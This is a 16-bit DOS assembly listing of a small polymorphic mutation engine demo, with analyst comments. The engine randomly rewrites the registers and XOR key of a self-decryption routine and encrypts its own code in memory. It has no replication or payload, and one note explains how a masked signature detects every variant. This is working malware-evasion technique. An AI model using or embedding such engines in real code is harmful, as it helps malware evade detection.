; SMut.ASM v2.4B * A Small Mutation Engine Demo
; by Tio Mate Jones
;
; Syntax/target: MASM/TASM-style directives (segment/proc/ends), 16-bit
; real-mode code laid out as a DOS .COM image (org 100h, exit via int 20h).
;
; What the listing does, as far as the visible code shows:
;   * init    - computes the load delta and patches two immediates in the
;               XOR routine so the routine works at any load offset.
;   * mutate  - rewrites register-selecting bits and the key byte of the
;               XOR routine in memory.
;   * encrypt - XORs the bytes from startofcode up to the patched bound
;               with the key; calling it twice restores the bytes.
; The only services invoked are int 21h/AH=2Ch (get time) and int 20h
; (terminate); this listing performs no file I/O.
;
; Analyst note: the XOR routine keeps the same instruction order and the
; same length in every variant. mutate changes only register-field bits in
; fixed opcode/ModR/M positions, the one-byte key, and two address
; immediates, so a byte pattern with masks at those positions covers every
; variant this engine can emit.

codesize        equ     endofcode-pgstart+1     ; Size of program (not referenced elsewhere in this listing)
encrsize        equ     endofcode-startofcode+1 ; Size of encrypted code

mutant          segment byte public 'code'
                ;assume  cs: mutant, ds: mutant,
                ;ss: mutant, es: mutant
                org     100h

; This is merely some demonstration code used for development....
; This is NOT the source-code for a virus.
; It only includes a sample encryption routine and a sample mutation engine.

given           proc    near
start:          jmp     pgstart
exlib:          int     20h                     ; Insert appropriate code here...
                nop

; call/pop delta trick: the call pushes the runtime address of init,
; pop si retrieves it, and subtracting the assembled offset leaves
; si = (runtime address - assembled address). si stays the base for every
; [si+offset X] patch below.
pgstart:        call    init
init:           pop     si                      ; Where am I?
                sub     si, offset init
                mov     ax, si                  ; Plug values directly into encryption/decryption
                add     ax, offset startofcode  ; routine
                mov     [si+offset Z0+1], ax    ; Allows for relocatable code!!
                                                ; (Z0+1 = imm16 of the one-byte-opcode mov at Z0)
                add     ax, encrsize            ; ax = runtime startofcode + encrsize,
                                                ; i.e. runtime endofcode + 1 (encrsize includes a +1)
                mov     [si+offset Z5+2], ax    ; Z5+2 = imm16 of the cmp at Z5; the patch offset
                                                ; assumes the opcode+ModR/M+imm16 form of cmp

mtest:          call    mutate                  ; Test the mutation....
                call    encrypt                 ; first pass XORs startofcode.. (mutate included)
                call    encrypt                 ; second pass with the same key undoes the first
                ; Test the encryption/decryption routine. If it works (it does),
                ; Smut can be run an infinite number of times
                int     20h                     ; DOS exit

; This is the encryption/decryption routine
;
; As assembled: index register = BX, working register = AH, key = 0.
; Labels P0-P3 and Z0-Z5 mark the bytes that init and mutate overwrite;
; the instructions shown are therefore only the assembled starting state.
; This routine sits before startofcode, so it is outside the XORed range.
encrypt:
P0:             push    bx                      ; Save registers used
P1:             push    ax
Z0:             mov     bx, offset startofcode  ; It may look inefficient, but it's easy to mutate
xorloop:
Z1:             mov     ah, [bx]                ; load one byte
Z2:             xor     ah, 0                   ; key byte lives at Z2+2 (changed by mutate)
Z3:             mov     [bx], ah                ; store it back in place
Z4:             inc     bx
Z5:             cmp     bx, offset endofcode    ; immediate is replaced by init at run time
                jle     xorloop                 ; signed compare: loops while index <= patched bound
P2:             pop     ax                      ; Restore registers
P3:             pop     bx
                ret

; Other code to be encrypted begins here...

; This is the mutation engine: (This demo will only produce sixteen possible
; variations, and thus is not a threat to western civilization.)
;
; In:    si = load delta computed at init
; Uses:  ax, cx (ch), dx; int 21h/AH=2Ch returns time fields in cx/dx
; Effect: overwrites bytes at P0..P3, Z0, Z1+1, Z2+1, Z2+2, Z3+1, Z4, Z5+1.
; Register choice: 8 byte registers x 2 index registers = the sixteen
; variations named above; the key byte varies independently.
startofcode:
mutate:
getrand:        mov     ah, 2Ch                 ; Get a "random" number
                int     21h                     ; Call DOS GetTime routine
mut:            ; DH = operating register, encoded 0..7 after masking
                ;      (x86 byte-register order: AL, CL, DL, BL, AH, CH, DH, BH)
                ; DL = index register (SI or DI) and Encryption Value
                add     [si+offset Z2+2], dl    ; Change the Encryption Value
                jz      getrand                 ; if zero, get a new value...
                                                ; (a zero key would make the XOR a no-op)
                and     dx, 0702h               ; Only need DH=0..7 and DL=0 or 2
                shr     dl, 1                   ; Compensate for inaccurate hundredths of sec.
                                                ; (uses bit 1 of DL rather than bit 0; DL is now 0 or 1)
                or      dl, 6                   ; DL = 6 or 7, the register numbers of SI / DI
                mov     al, 40h                 ; 40h+r = inc r16
                or      al, dl
                mov     [si+offset Z4], al      ; Z4 becomes inc si / inc di
                mov     al, 0F0h                ; ModR/M 11 110 rrr = xor r8, imm8
                or      al, dh
                mov     [si+offset Z2+1], al    ; Mutate XOR
                mov     ch, dh                  ; save DH
                shl     dh, 1                   ; move the register number into the ModR/M reg field
                shl     dh, 1                   ; (bits 5..3)
                shl     dh, 1
                mov     al, dh
                and     dl, 1                   ; adjust format: back to 0 or 1
                or      dl, 4                   ; r/m = 100b [SI] or 101b [DI] with mod = 00
                or      al, dl
                mov     [si+offset Z1+1], al    ; Mutate MOV (load)
                mov     [si+offset Z3+1], al    ; same ModR/M byte for the store
                or      dl, 6                   ; DL = 6 or 7 again
                mov     al, 0B8h                ; B8h+r = mov r16, imm16
                or      al, dl
                mov     [si+offset Z0], al      ; Z0 becomes mov si/di, imm16
cmp_mut:        mov     al, 0F8h                ; Mutate CMP: ModR/M 11 111 rrr = cmp r16, imm
                or      al, dl
                mov     [si+offset Z5+1], al
pp_mut:         mov     ax, 5050h               ; Mutate PUSH, POP (50h+r = push r16)
                mov     dh, ch                  ; restore DH
                and     dh, 3                   ; 0..3 = AX/CX/DX/BX, the word register that
                                                ; contains the chosen byte register
                or      ax, dx                  ; AL = push index reg, AH = push working reg
                mov     [si+offset P0], ax      ; word store: AL -> P0, AH -> P1
                mov     ax, 5858h               ; 58h+r = pop r16
                or      al, dh                  ; AL = pop working reg
                or      ah, dl                  ; AH = pop index reg
                mov     [si+offset P2], ax      ; word store: AL -> P2, AH -> P3 (reverse of the pushes)
                ret

; Put more encrypted coding or data here...

;tagline:
;        label word
;        db 'SMut v2.4B'

; Any fool who blindly inserts this mutation engine into a virus which
; he or she spreads into the wild shall spend all of eternity in the
; netherworld being pummeled with blunt objects by little gnomes who
; sing horrid top forty songs off key...

endofcode:
given           endp
mutant          ends
                end     given